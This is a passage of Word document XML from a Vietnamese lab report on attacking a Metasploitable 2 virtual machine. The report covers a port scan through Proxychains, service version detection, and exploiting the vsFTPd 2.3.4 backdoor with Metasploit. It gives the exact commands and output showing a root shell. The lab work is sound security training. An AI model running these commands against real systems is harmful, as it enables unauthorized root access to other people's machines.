    </w:p>
    <w:p w14:paraId="40C14865" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Quét cổng với Nmap (qua Proxychains)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520332D7" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Để ẩn danh trong quá trình quét, sử dụng Proxychains kết hợp với Nmap thực hiện quét toàn bộ cổng TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC24E60" w14:textId="190134CF" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo proxychains nmap -sS -p-</w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ip máy metasploiable 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C45A4C6" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả quét cho thấy nhiều cổng đang mở trên máy mục tiêu, trong đó đáng chú ý có cổng 21/tcp (FTP). Một số</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cổng mở tiêu biểu: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D2454F" w14:paraId="6AF3770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Pr>
          <w:p w14:paraId="56CF08FC" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cổng</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Pr>
          <w:p w14:paraId="5F988935" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Trạng thái</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Pr>
          <w:p w14:paraId="79D4920A" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dịch vụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="11F030B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192A28E1" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="016EF16B"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183059C2" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="5529FBF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46887A4F" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CC90AE4"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47B3BB6C" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="36F33A6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46B43BD9" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B68DD1C"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50F73684" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="65397DD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2C1429BB" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>25/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C91BA23"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1D9E83F8" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="234B89A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699E46AC" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>53/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="780A27F2"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38AB6B98" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="1349932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23EC8092" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="430D1DA8"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69378DD8" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="593CDBF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089FFAEB" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>139/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C69CD7A"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01FCC5CC" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="3EC368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0ED000DC" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>445/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CBDA5C7"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728DA36C" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>microsoft-ds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="211DFA0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697FC588" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3306/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65C9EE09"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0EBDC43C" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="38C4B00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160DBC48" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27FCD28D"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29262E23" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>postgresql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D2454F" w14:paraId="072B6B3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Pr>
          <w:p w14:paraId="6CA303E4" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5900/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44D936DE" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C1AB1FF" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27BBEB54" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ngoài ra còn có các cổng khác như 1099, 1524, 2049, 2121, 3306, 5432, 5900, 6000, 6667, 8009, 8180… Tổng thời gian quét khoảng 79 giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FB5A7" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.4. Xác định phiên bản dịch vụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28B416" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp tục sử dụng Nmap với tùy chọn nhận diện phiên bản dị</w:t>
      </w:r>
      <w:r>
        <w:t>ch vụ (qua Proxychains):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0691A9E8" w14:textId="20B44E68" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains nmap -sV </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[ip máy metasploiable 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2FCAC7" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trong một số trường hợp, kết quả trả về trạng thái “tcpwrapped” do lớp bảo vệ hoặc cấu hình proxy, khiến thông tin phiên bản chi tiết bị che giấu. Tuy nhiên, từ kết quả quét trước và banner FTP sau này, có thể xác định dịch vụ FTP đang chạy là vsFTPd 2.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – phiên bản chứa backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82EF30" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.5. Khai thác lỗ hổng bằng Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331ED570" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mở Metasploit Framework và sử dụng module khai thác chuyên biệt cho lỗ hổng vsFTPd 2.3.4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEEABA" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AFAE86" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7130F" w14:textId="19EB4666" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOST </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[target ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E33121F" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B09DA" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả khai thác thành công được ghi nhận như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C5BAD4" w14:textId="162E58D5" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[target ip]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:21 - Banner: 220 (vsFTPd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D0731" w14:textId="5E4978D4" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[target ip]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:21 - USER: 331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829DB23" w14:textId="7B7F3C1C" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[target ip]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:21 - Backdoor service has been spawned, ha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ndling...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C89C9E" w14:textId="79A6FAC1" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[target ip]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:21 - UID: uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D1724" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[*] Found shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD8D54" w14:textId="386D1067" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*] Command shell session 1 opened (</w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>source ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
